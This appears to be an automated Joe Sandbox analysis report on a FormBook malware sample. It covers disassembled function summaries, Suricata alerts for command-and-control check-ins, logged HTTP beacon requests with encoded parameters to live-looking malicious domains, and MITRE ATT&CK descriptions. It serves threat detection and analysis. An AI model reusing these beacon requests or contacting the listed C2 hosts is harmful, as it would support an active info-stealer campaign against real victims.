__aulldvrm.LIBCMT ref: 0374B6BF

Strings

+, xrefs: 0374B65A
-, xrefs: 0374B650
0, xrefs: 0374B66F
0, xrefs: 0374B695

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 3f8fbbd55e85fa27a831091f002389ec21afd592f7f1bd3c19e20003f1a33fa0
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: DC81AD70E052499ADF29CF68C9917FEBBA6AF45320F1C415ED8E1A7391C734EC409B51

Function 037B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 037B214F
___swprintf_l.LIBCMT ref: 037B2172

Strings

[, xrefs: 037B212B
%%%u, xrefs: 037B2146
]:%u, xrefs: 037B2169

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 1c4084aee85bcc63801d48062acb966f51fec427eb62f6fd28e975cadd14a0d7
Instruction ID: 7e4054932785abf193da214f593b26b042ed00c7730d6349d84886607eb757ca
Opcode Fuzzy Hash: 1c4084aee85bcc63801d48062acb966f51fec427eb62f6fd28e975cadd14a0d7
Instruction Fuzzy Hash: 0C216276A0121DAFCB10DF79CC44AEEB7F9EF44640F180516E915E7201E730E9028BA1

Function 0372F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037702BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037702E7
RTL: Re-Waiting, xrefs: 0377031E

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 9fe12a2174d5f7e66f82e023f57bd54075d6b6d749934eca6f55a6a10d5ab21c
Instruction ID: 30000e33aa2f82ec29c49bebbbdd4461ffd6308f6f060a564275c09c96b500fc
Opcode Fuzzy Hash: 9fe12a2174d5f7e66f82e023f57bd54075d6b6d749934eca6f55a6a10d5ab21c
Instruction Fuzzy Hash: 6EE18B356047419FDB25CF28C884B2ABBF0FB89724F184A6DF5A58B2E1D774E944CB42

Function 0373BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 03777B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03777B7F
RTL: Re-Waiting, xrefs: 03777BAC

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 9dabd905ba843b3e75537bdf2c04cac37fc76e7f7f502059f776ffa502a68ee1
Instruction ID: 030df9900ebdf4ee8b395b76b796fdaeba6030f37e0e4c1645ec7cda0418fa32
Opcode Fuzzy Hash: 9dabd905ba843b3e75537bdf2c04cac37fc76e7f7f502059f776ffa502a68ee1
Instruction Fuzzy Hash: 1E4101353017439FCB24DE29C844B6AB7E5EF8A720F040A2DF95ADB691DB31E8058F91

Function 0373B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0377728C

Strings

RTL: Resource at %p, xrefs: 037772A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03777294
RTL: Re-Waiting, xrefs: 037772C1

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 70344431fa0c18487141569d55450b7739dc1f1309d67d0edf55742f3f48bfa8
Instruction ID: bf7dc0e4a47cd25d7336d38096261c0d2e7ac62ed2752679004f524eca12c467
Opcode Fuzzy Hash: 70344431fa0c18487141569d55450b7739dc1f1309d67d0edf55742f3f48bfa8
Instruction Fuzzy Hash: EF41FD36700342ABCB24DE24CC41F6AB7B5FF85720F140A19F965AB241DB20F812DBD1

Function 037B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 037B238D
___swprintf_l.LIBCMT ref: 037B23B3

Strings

]:%u, xrefs: 037B23AA
%%%u, xrefs: 037B2384

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ed570969d0e56b6bd2389d8ff04939e73eca352629c4b3725e315772b3cee92b
Instruction ID: e4966814de8c5d8b875505ed2bc6d9e8bdb322b970a2ceea9f19dccad9abd3af
Opcode Fuzzy Hash: ed570969d0e56b6bd2389d8ff04939e73eca352629c4b3725e315772b3cee92b
Instruction Fuzzy Hash: 94318976A01219AFCB20DF29CC44BEEB7F8EF48610F544955E849E7241EB30EA458FB0

Function 03747D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03747E8B

Strings

+, xrefs: 03747DE8
-, xrefs: 03747DDD

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: cdd063200fc3acc9cf95085a8a7dfdae8c25afde5af32aefc6740c983e925130
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: E1919470E0035AEBDB28DE69C881ABEB7A5FF44720F58461AE875E72D0D730B9418B51

Function 03709126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 03709175
$, xrefs: 03709191

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: c905cf2d561d3e3b556dd69be60f0a521881c862bbbc4ec1ef5ec690dd67abac
Instruction ID: 7beaa4c4d7eef1cce7a9e688e6a591f81f99812e220a87ceed8aaddd4249b48a
Opcode Fuzzy Hash: c905cf2d561d3e3b556dd69be60f0a521881c862bbbc4ec1ef5ec690dd67abac
Instruction Fuzzy Hash: 9D814B75D00269DBDB71DB54CC54BEEB7B8AB09710F0445EAEA09B7291D7305E84CFA0

Function 0378CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0378CFBD

Strings

@4Cw@4Cw, xrefs: 0378CFD5, 0378CFDA, 0378CFF1
@, xrefs: 0378CF0A

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: a0546284ea689418041b0b0f6b3f3c686f005b86bf590ed44f334f75890bc6de
Instruction ID: 6484dccba575c5188abe4cd5a033dfa1f007a359f82fe67103121bfa1d0a2bea
Opcode Fuzzy Hash: a0546284ea689418041b0b0f6b3f3c686f005b86bf590ed44f334f75890bc6de
Instruction Fuzzy Hash: 7341BF76A40218DFDB21EFA9C844A6DFBB8FF45B00F04442AE914EF295D734D801DB61

Source: http://www.accupower.tech/bruv/	Avira URL Cloud: Label: malware
Source: http://www.accupower.tech/bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj	Avira URL Cloud: Label: malware

Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then xor eax, eax		12_2_02D99BD0
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then mov ebx, 00000004h		12_2_03A204DE

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49947 -> 168.206.11.225:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50025 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 217.160.0.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 217.160.0.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50043 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 162.0.229.222:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50050 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50037 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50042 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50045 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50029 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50047 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50038 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50044 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50041 -> 92.118.228.160:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 213.249.67.10:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50049 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50048 -> 209.74.64.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50033 -> 217.160.0.158:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 217.160.0.158:80

Source: Joe Sandbox View	IP Address: 213.249.67.10 213.249.67.10
Source: Joe Sandbox View	IP Address: 217.160.0.158 217.160.0.158

Source: Joe Sandbox View	ASN Name: METAREGISTRARNL METAREGISTRARNL
Source: Joe Sandbox View	ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /fi6o/?0dfXG=hGALt7t5gSxqIzGlUS2XPVJcZRq8G4bpVz89Igngf/M66ae3aRT9B4yDBGrb5mJVJyE8wpLrmF7Ln1eyeL70u5A2xvjbG9IBG0pL8zTYHC2rbtbDMuSlaq2pAvIKqKWvpuiBTOk=&U0W=7ROlj HTTP/1.1Host: www.iwhfa.fyiAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /vt2q/?0dfXG=NeoW3ZpGNhFVpRE+iGe18olEV8dN0FIDCvpVAutU77D6mk6iXiXc50i5bVx+uujx/SS4gHQAhcY6fImMEntZJ64couIpYsJtCpfvEgcpegPN4ht4aXCPY1AcPZvlMYHCMmAE9mg=&U0W=7ROlj HTTP/1.1Host: www.nieuws-july202502.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lbm4/?0dfXG=b6KmuAKoHDfmH6wBa4Iuhs+4qAfci8KJxStQSrt0xRWxrI04LbR2sZmSZHliQZPsTEeCyhZmzit1d7xvCBPKA7cM2dH3/rnJzTWpKXRa2CCyGb+HtjdcybjYJ406KzLAcPDnEDo=&U0W=7ROlj HTTP/1.1Host: www.wiretap.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bpal/?0dfXG=VMgVOaCh3mm+GdPlwv+P/XKcyqoSqp/AEn6p1isqCLPz7ObQC9Sqz3hudnfRRQZjENudSaBoMynPI/uiESQeR0wcE+BMO0b1K91MeQYvtVLH9vcXww6dd1bPq3nzmSOiSfDHfUE=&U0W=7ROlj HTTP/1.1Host: www.impulsarnegocios.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj HTTP/1.1Host: www.accupower.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /x6qo/?0dfXG=LYoYqqsXSyXZ912d02KeRxWxUajovPP+KCE++TS9h3rijU4gS1lBkAl2SxoHngebSXZzdlj5br48AWpKGxuZwHFzrTAaxdvQ/X7He5kEj4NwOXn+jWKWbQEmUjM4tYdd4DTDmwg=&U0W=7ROlj HTTP/1.1Host: www.tanjavanlaar.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wlzg/?0dfXG=c08zQlMNeTS9mFjcPTIyFfA1amU1nGqngy7ufrhJTucKXTiOjnqlR7bZNhOZWme4Y5s9JAieBcHnX0Bnfm5WdfKnufcgj0lRy4Tut92jAo5YyVSLqem1aQwSKpkntqqW/GXfj2I=&U0W=7ROlj HTTP/1.1Host: www.kuaimaolife.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ktuy/?U0W=7ROlj&0dfXG=652DQ4wRyI2XhVz/YhB0IQPCvW3zE+wrC97TZKhiuJWrpaOjtOEU/fEJ0zut8nj2vm3uuaJhtQEDGSF/YMgRQz9E7T0dRnILtzW899MV4oEvPyMvvne8hVkOXAeZd0jlejfVwHA= HTTP/1.1Host: www.funddata-x.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /zrnp/?0dfXG=7dvP3oKbkgtActo7X+aB5i8XRavAV5IyhK19vEIy5gkELgbrMMXbl9nvhn4QjRtqjZGCw7A4nUi7FbRpiGaR0ExHc3mJnAhEafCzKEQKll8qfESIyEeBcE8V5iUbRPjYsxxHG3c=&U0W=7ROlj HTTP/1.1Host: www.hellogus.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.iwhfa.fyi
Source: global traffic	DNS traffic detected: DNS query: www.nieuws-july202502.sbs
Source: global traffic	DNS traffic detected: DNS query: www.wiretap.digital
Source: global traffic	DNS traffic detected: DNS query: www.o30cf998d.cfd
Source: global traffic	DNS traffic detected: DNS query: www.impulsarnegocios.info
Source: global traffic	DNS traffic detected: DNS query: www.accupower.tech
Source: global traffic	DNS traffic detected: DNS query: www.tanjavanlaar.online
Source: global traffic	DNS traffic detected: DNS query: www.kuaimaolife.shop
Source: global traffic	DNS traffic detected: DNS query: www.funddata-x.net
Source: global traffic	DNS traffic detected: DNS query: www.hellogus.online

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
